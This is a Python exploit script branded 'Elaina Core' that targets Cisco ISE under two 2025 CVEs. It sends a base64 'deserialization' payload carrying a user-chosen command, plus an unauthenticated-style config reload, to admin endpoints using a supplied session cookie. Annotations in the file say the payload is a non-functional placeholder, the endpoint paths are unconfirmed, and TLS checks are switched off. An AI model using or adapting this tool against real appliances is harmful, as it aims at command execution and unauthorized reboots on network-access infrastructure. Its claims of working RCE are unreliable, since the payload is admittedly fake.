#!/usr/bin/env python3
"""Elaina Core - command-line proof-of-concept aimed at Cisco ISE.

The page attributes two issues to this script:

* CVE-2025-20124 - Java deserialization leading to command execution.
* CVE-2025-20125 - authorization bypass (config read / change / reboot).

Both code paths need an already authenticated ISE session cookie
(``--session``); nothing in this file obtains one.

Review notes for readers triaging this file:

* ``build_serialize_payload`` is a self-declared placeholder. It emits a
  text stand-in, not a serialized Java object, and carries no gadget chain.
* The two endpoint paths are used as written by the author; nothing on
  this page confirms that they exist on a real appliance.
* TLS certificate verification is switched off for every request and the
  urllib3 warnings are silenced, so the peer is never authenticated.
* Success is inferred from the HTTP status code alone.

Remediation for the two CVEs is the vendor's fixed release; this script
does not check whether a target is patched.

Author: Yuri08
GitHub: github.com/Yuri08loveElaina
"""
import argparse
import base64
import sys

import requests
import urllib3

# Silences urllib3 warnings for the whole process. Combined with
# verify=False on the requests below, a failed or absent certificate check
# produces no visible signal.
urllib3.disable_warnings()


def banner():
    """Print the tool's ASCII-art banner and credit lines to stdout."""
    # The art's original column alignment was lost on this page; the rows
    # are split at the most plausible boundaries.
    print(r"""
 ____ _ _ ____ ___ ___ ___
/ ___(_)_ __(_) ___ ___ / ___|_ _/ __/ _ \
| | | | '__| |/ __/ _ \| | | | (_| (_) |
| |___| | | | | (_| __/| |___ | |\___\___/
\____|_|_| |_|\___\___| \____|___|
Elaina Core – Cisco ISE RCE/BYOP Exploit
CVE‑2025‑20124 / CVE‑2025‑20125
Coder: Yuri08 | github.com/Yuri08loveElaina
""")


def build_serialize_payload(cmd):
    """Return a base64 string built from a placeholder template around *cmd*.

    Placeholder only: the author's own comment says a real exploit would
    need a gadget chain, and none is present here. Double quotes in *cmd*
    are backslash-escaped before being interpolated into the template.
    """
    # Placeholder Java serialization: a real exploit needs a gadget chain.
    escaped_cmd = cmd.replace('"', '\\"')
    template = f'\xac\xed\x00\x05sr\x00...ExecGadget...execute("{escaped_cmd}")'
    encoded = base64.b64encode(template.encode())
    return encoded.decode()


def exploit_deserialization(base_url, session_token, cmd):
    """POST the placeholder payload as JSON to the deserializer path.

    The request carries *session_token* as an ``ISESSIONID`` cookie and a
    JSON body of the form ``{"object": <base64 string>}``. The outcome is
    printed; nothing is returned.
    """
    endpoint = f"{base_url}/api/v1/admin/deserializer"
    cookie_header = {"Cookie": f"ISESSIONID={session_token}"}
    body = {"object": build_serialize_payload(cmd)}

    print(f"[+] CVE-20124: Sending deserialization payload to {endpoint}")
    # NOTE(review): verify=False skips certificate validation, and no
    # timeout is passed, so the call can block indefinitely.
    response = requests.post(endpoint, json=body, headers=cookie_header, verify=False)

    # A 200 only shows that the server answered; it is not evidence that
    # anything was executed (the message itself says "possibly").
    if response.status_code != 200:
        print(f"[-] Unexpected response: {response.status_code}")
    else:
        print("[+] Payload possibly executed!")


def exploit_auth_bypass(base_url, session_token):
    """POST an empty request to the reload path with the session cookie.

    Treats HTTP 200 or 204 as acceptance and prints the outcome; nothing
    is returned.
    """
    endpoint = f"{base_url}/api/v1/admin/reload"
    cookie_header = {"Cookie": f"ISESSIONID={session_token}"}

    print(f"[+] CVE-20125: Sending config reload request to {endpoint}")
    # NOTE(review): verify=False skips certificate validation, and no
    # timeout is passed, so the call can block indefinitely.
    response = requests.post(endpoint, headers=cookie_header, verify=False)

    accepted = response.status_code in (200, 204)
    if accepted:
        print("[+] Reload/config change accepted!")
    else:
        print(f"[-] Bypass failed: {response.status_code}")


def main():
    """Parse the command line, print the banner and run the selected paths.

    Exits with status 1 when neither ``--deser`` nor ``--bypass`` is given.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument("--url", required=True,
                        help="Base URL of Cisco ISE appliance")
    parser.add_argument("--session", required=True,
                        help="Authenticated ISE session token")
    parser.add_argument("--cmd",
                        help="Command to execute via deserialization")
    parser.add_argument("--deser", action="store_true",
                        help="Run CVE‑20124 exploit")
    parser.add_argument("--bypass", action="store_true",
                        help="Run CVE‑20125 bypass")
    args = parser.parse_args()

    banner()

    # Guard first: with neither flag set, neither request path can run.
    if not (args.deser or args.bypass):
        print("[-] Specify at least --deser or --bypass.")
        sys.exit(1)

    # NOTE(review): --deser without --cmd is skipped silently; no message
    # is printed for that combination.
    if args.deser and args.cmd:
        exploit_deserialization(args.url, args.session, args.cmd)

    if args.bypass:
        exploit_auth_bypass(args.url, args.session)


if __name__ == "__main__":
    main()